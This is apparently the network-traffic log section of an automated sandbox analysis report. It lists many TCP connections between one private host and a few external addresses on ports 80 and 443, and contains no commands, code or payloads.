            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
